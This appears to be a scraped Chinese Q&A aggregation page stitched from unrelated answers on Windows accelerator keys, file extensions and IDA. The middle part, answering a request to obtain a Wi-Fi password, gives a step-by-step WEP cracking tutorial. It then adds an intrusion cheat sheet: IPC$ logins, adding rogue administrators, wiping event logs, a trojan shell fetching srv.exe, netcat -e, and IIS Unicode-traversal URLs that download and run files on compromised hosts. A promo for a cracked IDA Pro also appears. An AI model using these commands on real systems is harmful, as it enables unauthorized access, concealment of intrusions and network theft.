命令ID——按下加速鍵後,Windows向程序發送的命令ID。如果想把加速鍵和菜單項關聯起來,這里就是要關聯期間項的命令ID。

類型——用來指定鍵的定義方式,可以是VIRTKEY和ASCII,分別用來表示「鍵名」欄位定義的是虛擬鍵還是ASCII碼。

選項——可以是Alt,Control或Shift中的單個或多個,如果指定多個,則中間用逗號隔開,表示加速鍵是按鍵加上這些控制鍵的組合鍵。這些選項只能在類型是VIRTKEY的情況下才能使用。

在鍵名的定義中,系統按鍵如F1,F2,BackSpace和Esc等都是用虛擬鍵的方法定義的,Resource.h中已經包括所有的預定義,它們是以VK_開頭的一引起值,如VK_BACK,VK_TAB,VK_RETURN,VK_ESCAPE,VK_DELETE,VK_F1和VK_F2等,讀者可以查看Resource.h文件,下面是加速鍵定義的一些例子:

下面是加速鍵定義的一些例子:

「^C」, ID ;Ctrl+C

「K」, ID ;Shift+K

「k」, ID,ALT ;Alt+k

98, ID,ASCII ;b(字元b的ASCII碼為98)

66, ID,ASCII ;B(Shift b)

「g」, ID ;g

VK_F1, ID,VIRTKEY ;F1

VK_F2, ID,VIRTKEY, CONTROL ;Ctrl + F1

VK_F3, ID,VIRTKEY,ALT,SHIFT ;Alt + Shift + F2

在一個資源腳本文件中,可以定義多個菜單和多個加速鍵表,當然也有其他各式各樣的資源,有點陣圖、圖標與對話框等,這就涉及為這些資源取ID值的問題,取值的時候要掌握的原則是:

(1)對於同類別的多個資源,資源ID必須為不同的值,如定義了兩個菜單,那麼它們的ID就必須用不同的數值表示,否則將無法分辨。

(2)對於不同類別的資源,資源ID在數值上可以是相同的,如可以將菜單和加速鍵的ID都定義為1,同時也可以有ID為1的點陣圖或圖標等,Windows並不會把它們搞混。

❼ mysql .idb .frm .par是什麼文件

【MySQL文件】

MySQL是一個關系型資料庫管理系統,由瑞典MySQL AB 公司開發,目前屬於 Oracle 旗下公司。MySQL 最流行的關系型資料庫管理系統,在 WEB 應用方面MySQL是最好的 RDBMS (Relational Database Management System,關系資料庫管理系統)
應用軟體之一。MySQL所使用的 SQL 語言是用於訪問資料庫的最常用標准化語言。

MySQL文件就是SQL文件,裡面就是建表語句 以.SQL為後綴。SQL腳本是包含一到多個SQL命令的SQL語句。以將這些SQL腳本放在一個文本文件中(SQL腳本文件),然後通過相關的命令執行這個SQL腳本文件。

【IDB文件】

IDB智能資料庫系統(multimedia intelligent database system)是一個對象資料庫管理系統。智能資料庫是研究利用人的推理、想像、記憶原理,實現對資料庫的存儲、搜索和修改。通過有效的組織,能夠滿足人們快速檢索和修改資料庫的要求。

IDB文件是一種 MSDev 中間層文件。當IDB文件在IDA打開,數據解壓到的文件的集合。後的資料庫被關閉時,該文件被壓縮回IDB文件。這使得更快的性能,同時在資料庫打開和較低的磁碟使用時關閉。

< H1 >其他IDB格式: < /H1 >在調試過程中由一個Visual Studio程序中創建的中間文件,如Visual C, 節省了編譯器的狀態,並用於最小的重建計劃和增量編譯。

【PAR文件】

PAR文件為交換文件,主要是Windows環境下的文件名 。絕大多數DOS文件名後綴在Windows下繼續有效,但Windows本身也引出了許多種嶄新的後綴名,如:*.drv為設備驅動程序(Driver)、*.fon和*.fot都是字型檔文件、*.grp為分組文件(Group)、*.ini為初始化信息文件 (Initiation)、*.pif為DOS環境下的可執行文件在Windows下執行時所需要的文件格式、*.crd即卡片文件(Card)、*.rec即記錄器宏文件(Record)、*.wri即文本文件(Write),它是字處理write.exe生成的文件、*.doc和*.rtf也是文本文件(Document),它們是Word產生的文件、*.cal為日歷文件、*.clp是剪貼板中的文件格式、*.htm和
*.html即主頁文件、*.par為交換文件、*.pwl為口令文件(Password)等等。

【FRM文件】

FRM文件是文本類型文件,用記事本就可以打開,而且也可以保存。

FRM文件擴展名信息:

1.表單;

2.Frame Maker或Frame Builder文檔;

3.Oracle可執行表(3.0版或早期版本);

4.Visual Basic表單;

5.WordPerfect Merge表單;

6.DataCAD標志報表文件。

❽ 如何獲取本機存儲的無線網密碼 如果回答的答案正確追加分數!!!

需要WinAircrackPack
該工具包是一個無線工具的組合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airomp.exe四個程序,這些程序各有各的用。
SSID號發現工具就是airomp.exe。對付 SSID影藏
第一步:解壓縮下載的工具包,運行里頭的airomp.exe
第二步:選擇相應的網卡,輸入對應無線網卡前的序號
第三步:輸入o或者a選擇網卡模式,
第四步:選擇搜索頻段,輸入0是代表所有頻段都檢測的意思。
第五步:接下來會提示你輸入一個保存文件,這樣該工具會把所有sniffer下來的數據包放到這個文件中
第六步:only write wep ivs是否只檢測WEP加密數據包,我們選擇「Y」即可。
第七步:這時會出現一個提示,大概意思就是說目前驅動還不支持,無法進行sniffer的操作。同時瀏覽器會自動轉到一個頁面,我們可以通過這個頁面下載兼容驅動程序,升級我們的無線網卡讓sniffer工具——airomp.exe可以順利運行

(2)下載無線網卡新驅動:
要想下載合適的無線網卡新驅動就需要到前面提到的那個跳轉頁面了。
第一步:打開的頁面地址為http://www.wildpackets.com/support/proct_support/airopeek/hardware,我們通過這個地址下載適合自己網卡的可以使用airomp的驅動。
第二步:在搜索設備頁面中選擇自己無線網卡的品牌和型號。筆者選擇tp-link的所有無線產品進行查詢,看看應該下載哪個驅動
第三步:在查詢結果頁面中我們可以看到自己的網卡應該使用該站點提供的AR5005G驅動來使用airomp
四步:再次返回http://www.wildpackets.com/support/proct_support/airopeek/hardware頁面,你會在該頁內容上看到關於該驅動所兼容的atheros卡型號,裡面會提到ar5005,雖然我們的是ar5005g但是可以使用。點該頁面下方的the wildpackets atheros wireless driver v4.2鏈接進行下載即可
第五步:下載wildpackets atheros wireless driver v4.2驅動到本地硬碟。
第六步:打開後裡面有三個文件,我們的無線網卡升級工作就要靠這三個文件。
(3)安裝無線網卡新驅動:
之前下載的wildpackets atheros wireless driver v4.2壓縮包里的三個文件就是我們安裝驅動的主角。
第一步:在桌面網上鄰居圖標上點滑鼠右鍵,並選擇屬性。
第二步:在自己的無線網卡對應的本地連接上點滑鼠右鍵,並選擇屬性。
第三步:在無線網路連接屬性窗口中的「常規」標簽下點網卡信息旁邊的「配置」按鈕。
第四步:在「驅動程序」標簽中點「更新驅動程序」按鈕。
第五步:系統將出現硬體安裝向導,我們選擇「從列表或指定位置安裝(高級),然後點「下一步」按鈕
第六步:然後選擇「不要搜索,我要自己選擇要安裝的驅動程序」,點「下一步」按鈕繼續。
七步:由於之前我們安裝的驅動是*****無線網卡的官方驅動,所以系統默認會找到相應的驅動,我們不選擇他們,點「從磁碟安裝」。
第八步:通過「瀏覽」按鈕找到我們下載並解壓縮的wildpackets atheros wireless driver v4.2文件保存目錄。
第九步:選擇atheros ar5005g cardbus wireless network adapter,點「下一步」繼續
第十步:在安裝驅動過程中會出現兼容性提示,我們點「仍然繼續」即可。
第十一步:系統復制必須文件到本地磁碟
第十二步:完成硬體更新向導,我們的TP-LINK無線網卡現在已經變成了atheros ar5005g無線網卡了,這樣才能夠使用airomp這個無線網路sniffer工具。
四、總 結:
由於WEP破解的准備工作比較多,已經成功的將自己的網卡進行了更新驅動工作,這也是WEP加密破解的關鍵,

開始 輕松破解無線網路WEP
一、使用airomp抓取無線網路數據包並破解SSID名稱:
不管是找出已經禁用了SSID號廣播的無線網路還是進行WEP解密工作,我們首先要做的就是通過無線網路sniffer工具——airomp來監視無線網路中的數據包。
第一步:打開文章中下載的winaircrackpack壓縮包解壓縮的目錄。
第二步:運行airomp.exe程序,這個就是我們的sniffer小工具,他的正常運行是建立在我們無線網卡已經更新驅動的基礎上。
第三步:這時你會發現顯示的信息和安裝驅動前已經不同了,我們的***網卡名稱已經變為13 atheros ar5005g cardbus wireless network adapter,也就是說他成功更新為與atheros兼容的硬體了。我們輸入其前面的數字13即可。
第四步:接下來是選擇無線網卡的類型,既然說了是與atheros相兼容的,所以直接輸入「a」進行選擇即可。
第五步:上面文章中提到了已經把無線網路的SSID廣播功能取消了,這樣我們假設還不知道該無線設備使用的哪個頻段和SSID號。在這里輸入0,這樣將檢測所有頻段的無線數據包。
實際上要想知道一個無線網路使用的頻段是非常簡單的,可以使用無線網卡管理配置工具,就像上文提到的那樣,可以知道該無線網路使用的速度和頻段,但是無法檢測出SSID號。
第六步:同樣輸入一個保存數據包信息的文件,例如輸入softer。這樣可以把檢測到的數據包以及統計信息一起寫到這個文件中,並為使用其他工具提供基礎保證。
第七步:是否只收集wep數據信息,我們點N」。這樣將檢測網路中的所有數據包不只WEP加密數據。
第八步:最後airomp會自動檢測網路中的所有頻段,對無線網路中的無線數據包進行統計和分析。
第九步:當統計的數據包比較多的時候,就可以自動分析出無線網路對應的SSID號和無線設備的MAC地址以及無線速度,發射頻段和是否加密,採用何種方式加密了,是不是非常神氣?例如設置的無線網路SSID號為softer,剛開始圖7中統計時還沒有檢測出來,當數據達到一定數量後例如DATA處為 15651時就可以看到ESSID號即SSID號為softer了。
至此我們成功的實現了通過airomp找到沒有開啟SSID廣播功能的無線網路對應的SSID號,所以說僅僅報著將SSID號隱藏並修改默認名字是不能阻止非法入侵者連接無線網路的。不管你是否開啟SSID廣播,我們都可以通過無線網路的sniffer工具來找出你的真實SSID名稱。
不過有一點要特別注意,那就是是否能夠破解SSID名稱是建立在airomp搜集到足夠的數據包基礎上的,也就是說也可能你的無線路由器開著,但是沒有任何無線網卡和他通訊,這樣airomp是無法檢測到任何無線數據包並進行分析破解的。筆者在寫本文進行的實驗環境也是如此,那另外一塊TP-LINK無線網卡510G安裝在一台聯想筆記本上並不停的通過無線路由器進行BT下載來保持總是不斷有無線數據傳輸,這樣才可以加快破解進程。
另外當數據包沒有收集足夠多的情況下,airomp會出現錯誤信息,例如本來是WEP加密方式的無線網路,可能會檢測為WPA。用戶只需要多等些時間讓airomp收集足夠多的數據就可以保證顯示結果的真實性了。

二、使用WinAircrack破解WEP密文:
雖然我們可以通過airomp來檢測無線網路的基本信息,包括發射頻段,無線網路的SSID名稱,無線速度等。但是對於那些使用WEP加密了的無線網路就無能為力了,即使我們知道了無線網路的SSID號如果沒有WEP加密密文的話,依然無法連接到該網路。
不過airomp收集到的信息也是非常寶貴的,我們可以通過另外一個工具來分析出WEP密文。該工具的名稱是WinAircrack,當然在用 WinAircrack破解airomp收集到的信息前一定保證airomp收集的信息量要大,信息越多破解越不容易出問題,而且破解成功所需時間越短。
第一步:打開下載的壓縮包,運行裡面的winaircrack.exe程序。
第二步:在左邊找到general,接下來點GENERAL界面中下方的click here to locate capture file...,讓我們選擇一個捕獲文件。
第三步:這個文件就是上面所提到的airomp保存下來的數據統計文件,第九步中已經為其起了一個名字叫softer了,那麼我們到airomp.exe所在文件夾中找到softer.cap文件,這個文件就是捕獲文件。
第四步:回到general界面,在encryption type處選擇WEP。
第五步:在左邊點WEP,在WEP設置標簽中先檢測64位密文,key index保持自動AUTO。因為大部分用戶在設置無線路由器WEP加密時都選擇了最簡單的64位密文,他也是破解所需時間最短的。
第六步:設置完畢點右下角的「aircrack the key...」按鈕,winaircrack會自動根據softer.cap中保存的統計信息進行分析,暴力破解WEP密文。
第七步:由於採取的是暴力破解方法,所以花費的時間會比較多,大概需要幾個小時甚至更多的時間來破解一個64位的WEP密文。當發現WEP密文後會顯示出內容.

不過在實際操作過程中需要的時間會比較長,特別是當WEP密文設置的比較復雜時,例如使用多個數字或者增加加密位數達到128位等。
另外通過airomp來收集無線數據傳輸包也是關鍵,也許對方開著路由器但並沒有和網卡進行大流量數據傳輸,這樣即使你開啟airomp收集了幾個小時,都可能出現無法獲得足夠數據包問題。
僅僅是為了和大家交流,希望大家不要使用本文介紹的方法去入侵別人的無線網,
大家能夠明白WEP加密也不是百分之百安全,所以應該盡量使用WPA安全加密方式。

--------------------------------------------------------------------------------

無線網路密碼破解
面的工具可以幫助你。你有點電腦基礎的話,很容易搞到密碼的。

Kismet:一款超強的無線嗅探器

NetStumbler:免費的Windows 802.11嗅探器

GFI LANguard:一款Windows平台上的商業網路安全掃描器

Airsnort:802.11 WEP加密破解工具

無非是掃描 嗅探 破解

與遠程主機建立空管連接) net use \\IP地址\ipc$ "" /use:""

(以管理員身份登錄遠程主機) net use \\IP地址\ipc$ "密碼" /use:"Administrator"

(傳送文件到遠程主機WINNT目錄下) 本機目錄路徑\程序 \\IP地址\admin$

(查看遠程主機時間) net time \\IP地址

(定時啟動某個程序) at \\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作組列表) nbtstat -A IP地址

(將遠程主機C盤映射為自己的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"

(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add

net localgroup Administrators 用戶名 /add

(斷開連接) net use \\IP地址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的「時間任務」服務:

netsvc /list \\IP地址

netsvc schele \\IP地址 /query

netsvc \\IP地址 schele /start

二、OpenTelnet.exe

遠程啟動主機的Telnet服務,並綁定埠到7878,例如:

OpenTelnet \\IP地址 用戶名 密碼 1 7878

然後就可以telnet到主機的7878埠,進入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機的7878埠,輸入密碼winshell,當看到CMD>後,可打下面的命令:

p Path (查看winshell主程序的路徑信息)

b reBoot (重新啟動機器)

d shutDown (關閉機器)

s Shell (執行後你就會看到可愛的「C:\>」)

x eXit (退出本次登錄會話,此命令並不終止winshell的運行)

CMD> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)

四、3389登陸器,GUI方式登錄遠程主機的

五、elsave.exe

事件日誌清除工具

elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l "system" -C

elsave -s \\IP地址 -l "security" -C

執行後成功清除應用程序日誌,系統日誌,安全日誌

六、hbulot.exe

開啟win2kserver和winxp的3389服務

hbulot [/r]

使用/r表示安裝完成後自動重起目標使設置生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些腳本程序都要用到它,也可做溢出後的連接用。

想要連接到某處: nc [-options] hostname port[s] [ports] ...

綁定埠等待連接: nc -l -p port [-options] [hostname] [port]

參數:

-e prog 程序重定向,一旦連接,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 幫助信息

-i secs 延時的間隔

-l 監聽模式,用於入站連接

-n 指定數字的IP地址,不能用hostname

-o file 記錄16進制的傳輸

-p port 本地埠號

-r 任意指定本地及遠程埠

-s addr 本地源地址

-u UDP模式

-v 詳細輸出——用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉——用於掃描時

八、TFTPD32.EXE

把自己的電腦臨時變為一台FTP伺服器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名

然後可以直接令文件運行:

http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、 prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇「溢出後在一個埠監聽」,然後用 telnet連接它的監聽埠,如果溢出成功,一連它的埠,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以後winxp 下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行許可權的目錄。然後用IE瀏覽器連接。

一、一 Xscan命令行運行參數說明:

在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據後提前退出程序,按""強行關閉程序。

1.命令格式: xscan -host [-] [其他選項]

xscan -file [其他選項]

其中 含義如下:

-port : 檢測常用服務的埠狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定製待檢測埠列表);

-ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

-ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);

-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);

[其他選項] 含義如下:

-v: 顯示詳細掃描進度

-p: 跳過Ping不通的主機

-o: 跳過沒有檢測到開放埠的主機

-t : 指定最大並發線程數量和並發主機數量, 默認數量為100,10

採納我吧 謝謝

❾ ida 分析 32位程序 需要使用32位 ida嗎

DLL 屬於可執行文件中的一類,又稱為動態鏈接庫,不能直接用DEBUG載入,一般由應用程序因使用該庫中的函數,而由操作系統在應用程序載入的同時被載入入特定地址,這個地址一般是DLL在鏈接時指定的。當DLL被載入到運行空間,根據輸出函數表,可以得到各個函數的入口地址,然後用DEBUG在各個入口下斷點,調用該函數時DEBUG將跟蹤進入該函數,從而實現反匯編。
反匯編屬於逆向工程,逆向工程的主要手段有兩大類,其中一類是動態分析,另一類是靜態分析。
前面提到的方法屬於動態分析,由DEBUG實現反匯編,該方法不容易得到完整的代碼,一般只能形成一段一段獨立分散的代碼,同時由於DEBUG的局限性,反匯編的代碼質量多不高,生成的代碼不能直接使用,原因在於DLL在載入時若沒有載入到指定地址空間,操作系統將對代碼進行重定向,所以DEBUG只能得到重定向後的代碼,這類代碼必須修改每一個重定向點,才能形成可執行代碼。作為WINDOWS32位操作系統, OLLYDBG是最為優秀的調試、跟蹤、反匯編工具,多窗口運行,可以方便的通過窗口操作完成各類動作,而不需要像一般DEBUG那樣由命令行來完成,OLLYDBG還有許多一般調試器不具備的功能,同時由於每一代高手不斷的修改,使其具有多種功能,同時帶來的就是混亂,誰也不知道有多少版本,誰也不清楚每個版本到底增加了什麼功能,但就這樣,也是瑕不掩疵, OLLYDBG任然是DEBUG中最強大,最好使用的。
靜態分析和動態分析不同,靜態分析直接打開原程序,載入而不運行,然後直接分析載入的代碼。目前靜態分析工具,最強大的當屬IDA,IDA支持幾乎所有種類的匯編語言。
IDA載入應用程序有許多選項,可以選擇完整的載入整個程序,也可以選擇載入程序的某個塊,一般可選擇的是否載入文件頭、資源表、輸入表、輸出表等等。
IDA還支持調試,也就是說,當你在進行反匯編過程時,可以直接使用IDA來調試跟蹤,以分析代碼的動態執行情況,不過就動態跟蹤來說,OLLYDBG更為強大。
IDA反匯編的正確率和代碼的復雜程度有關,對於正規開發的代碼,尤其是如果能夠獲得源程序的調試文件,即所謂的PDB文件,IDA可以讀取PDB文件中的信息,使得反匯編的效率和准確度大為提高,生成的代碼甚至比源代碼易讀。IDA將反匯編生成的結果存入IDB文件中。當你確認反匯編的結果達到你的要求,可以讓IDA輸出匯編源代碼,IDA也提供其他格式的輸出,例如HTML文件,便於用戶閱讀。樓主主要是用於分析DLL文件,一般來說這類文件更適合做靜態分析,所以推薦使用IDA來進行。
IDA對於分析那些加殼或含有大量花指令、混淆代碼、垃圾代碼的程序,反匯編的正確率會大為下降,因為IDA無法正確的確認當期位置上的數值是屬於代碼,還是屬於數據,是普通C字元,還是DELPHI的字元串,還是UNICODE字元串,是結構數據還是數組還是類表(DELPHI生成的代碼中含有大量的類表)等等。遇到這種情況,就需要使用者掌握許多技巧,例如可以通過使用者對當前數據的認識,指導IDA如何處理當前的數據。對於大批量的,具有某些規律的數據,IDA還提供了腳本語言(文件尾位idc),通過對腳本的執行來指導IDA如何進行反匯編。對於更為復雜的情況,例如程序是自解壓運行的,這時IDA就沒有任何能力來進行正確的分析,通常都會用OLLYDBG動態跟蹤,等程序完成自解壓後從內存中將解壓後的代碼完整的挖下來形成文件,再由IDA進行靜態分析。
對於成功進行反匯編的代碼,IDA根據代碼的入口、調用、轉移等指令,可以為使用者提供各種格式的程序的流程圖,IDA提供許多格式由用戶選擇,便於用戶理解程序的結構。

匯編語言的科學定義,其實就是介於機器碼(各種01)和高級語言(如C)之間的一種語言。你用C語言寫一段程序,其實要在機器上運行的話,機器是不懂的,要經過編譯器、匯編器編譯,變成匯編,最終再變成機器碼,機器根據這些機器碼的01可以控制硬體電路完成你程序想執行的操作。

❿ ida pro 6.4怎樣漢化

可保存結果的最終版來了
1 解除時間限制
2 解除每30分鍾跳出提示的限制
3 解除復制粘貼的限制
4 解除批處理限制。。。
5 增加插件支持和F5功能
6 增加保存idc功能Shift+s (實現保存分析可以根據時間保存多個快照)
7 增加各種加密狗的sig
8 增加各種iphone系統庫的sig識別
9 增加ida直接修改文件功能插件
10增加調試器隱藏反反調試插件
11增加演算法識別插件
12增加ida_sync同步分析插件
13增加arm code 插件快捷鍵I K鍵
14增加2進制數據復制粘貼插件
15增加資源導出插件
16增加UniCodeString和Unicode Convert插件來增強字元解析
測試環境winxp正常 win7x64會有一些功能不正常比方close功能
關於保存功能:
我寫了個插件保存用shift+s把當前資料庫保存成idc檔!這個功能類似於快照功能!下次用的時候先反

編譯程序完成後再用load腳本功能把你保存的idc腳本載入!分析的注釋啥的就都恢復了

閱讀全文

與ida腳本命令報錯相關的資料

熱點內容
在電腦上怎麼找到加密狗圖標 瀏覽:435
電腦的瀏覽器怎麼打開pdf文件怎麼打開 瀏覽:142
pdf卡片庫下載 瀏覽:11
單片機中二進製表示什麼 瀏覽:725
java網路編程推薦 瀏覽:794
施耐德開關編程 瀏覽:65
組織胚胎學pdf 瀏覽:844
linux查看發包 瀏覽:496
加密貨幣交易所暴利時代 瀏覽:824
歌詞滾動效果android 瀏覽:14
程序員一天的六場戰斗 瀏覽:797
自製壓縮泵的做法 瀏覽:622
androidstring變數 瀏覽:247
數學乘法速演算法 瀏覽:986
壓縮包製作後照片順序怎麼改 瀏覽:680
fibonacci數列演算法 瀏覽:775
產品經理要和程序員吵架嗎 瀏覽:252
grub2命令行 瀏覽:618
無法獲取加密卡信息 瀏覽:775
雲伺服器網卡充值 瀏覽:509